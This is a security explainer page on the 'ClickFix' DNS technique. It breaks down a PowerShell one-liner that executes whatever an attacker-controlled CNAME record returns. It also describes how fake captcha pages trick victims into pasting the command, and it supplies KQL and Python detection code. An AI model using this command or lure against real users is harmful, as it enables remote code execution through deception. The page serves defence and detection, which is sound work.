Clickfix DNS

Execute commands via DNS CNAME records. The payload is fetched at runtime; no hardcoded commands in the script.

This command runs on Windows
Example Command breakdown
powershell -c "& (Resolve-DnsName clickfix-dns.intel.cx -Type CNAME).NameHost.TrimEnd('.')"
1. Invoke PowerShell

Runs PowerShell and passes the following string as a single command to execute.

powershell -c 

2. Call operator

The & (call) operator executes whatever the expression in parentheses returns. The opening quote starts the command string.

"& 

3. DNS CNAME lookup

Resolves the CNAME record for the domain. The record points to the payload (e.g. calc.exe).

(Resolve-DnsName clickfix-dns.intel.cx -Type CNAME)

4. Extract target

Gets the CNAME target from the DNS result: the hostname the record points to (e.g. calc.exe., with the trailing dot of an FQDN).

.NameHost

5. Clean and close

Removes the trailing dot from the DNS response (FQDN format) to get a valid executable name, then closes the command string.

.TrimEnd('.')"
How it works
The attack chain from victim execution to payload delivery
  1. Victim runs the command

     The powershell -c one-liner is presented on a fake “support” or “fix” page. The page usually copies the command to the clipboard in the background, then prompts the victim to press Win+R (opens the Run dialog), Ctrl+V (pastes), and Enter (executes the command).

  2. DNS CNAME lookup

     Resolve-DnsName clickfix-dns.intel.cx -Type CNAME performs a DNS lookup. The CNAME record in this example points to calc.exe.

  3. Extract and execute

     .NameHost and .TrimEnd('.') extract calc.exe. The & call operator executes it, launching Calculator.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks online. A fake reCAPTCHA-style prompt feels familiar and trustworthy, lowering suspicion.
  • No hardcoded payload. The command contains no executable, script, or URL, only a domain name. Static analysis and signatures miss it.
  • Flexible execution. The DNS record can point to anything on the victim's machine (e.g. calc.exe, PowerShell, a script path) or to another host. The attacker decides at DNS level.
  • Attacker-controlled at any time. Change the CNAME record and the same command now delivers a different payload. No need to redistribute links or documents.
Interactive demo
The demo reproduces the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter. Note: the command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for PowerShell DNS CNAME execution
// Microsoft Defender Advanced Hunting (KQL). Flags process launches whose command line
// carries every token of the DNS CNAME execution pattern; KQL `contains` is case-insensitive.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "Resolve-DnsName"
  and ProcessCommandLine contains "-Type"
  and ProcessCommandLine contains "CNAME"
  and ProcessCommandLine contains "NameHost"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
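The same four predicates as the hunting query, applied to process-creation records from any source (not only Defender), plus extraction of the queried domain so it can be blocked or sinkholed, and a confidence level that distinguishes a bare lookup from the & call-operator execution form. This is an added example, not code from the original page; the events are constructed samples.

```python
import re

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"DeviceName": "WS01", "AccountName": "alice",
     "ProcessCommandLine": "powershell -c \"& (Resolve-DnsName clickfix-dns.intel.cx -Type CNAME).NameHost.TrimEnd('.')\""},
    {"DeviceName": "WS02", "AccountName": "bob",
     "ProcessCommandLine": "powershell -Command Resolve-DnsName example.com -Type MX"},
    {"DeviceName": "WS03", "AccountName": "carol",
     "ProcessCommandLine": "POWERSHELL -c \"& (resolve-dnsname EXAMPLE.TEST -type cname).namehost.trimend('.')\""},
    {"DeviceName": "WS04", "AccountName": "dave",
     "ProcessCommandLine": "notepad.exe C:\\Users\\dave\\notes.txt"},
]

# Same tokens as the Advanced Hunting query; compared case-insensitively like KQL's `contains`.
REQUIRED_TOKENS = ("resolve-dnsname", "-type", "cname", "namehost")

# Domain passed to Resolve-DnsName (first positional or -Name parameter).
DOMAIN_RE = re.compile(r"resolve-dnsname\s+(?:-name\s+)?['\"]?([a-z0-9.-]+)", re.IGNORECASE)

# The & call operator applied directly to the lookup result: the execution form, not just a query.
CALL_RE = re.compile(r"&\s*\(\s*resolve-dnsname", re.IGNORECASE)


def is_dns_cname_execution(cmdline: str) -> bool:
    """True when every token of the hunting pattern is present."""
    lowered = cmdline.lower()
    return all(token in lowered for token in REQUIRED_TOKENS)


def queried_domain(cmdline: str):
    """Return the looked-up domain (lower-cased) for blocking/sinkholing, or None."""
    match = DOMAIN_RE.search(cmdline)
    return match.group(1).lower() if match else None


def hunt(events):
    """Apply the detection to a list of events and return enriched hits."""
    hits = []
    for event in events:
        cmd = event["ProcessCommandLine"]
        if not is_dns_cname_execution(cmd):
            continue
        hits.append({
            "DeviceName": event["DeviceName"],
            "AccountName": event["AccountName"],
            "Domain": queried_domain(cmd),
            "Confidence": "high" if CALL_RE.search(cmd) else "medium",
            "ProcessCommandLine": cmd,
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```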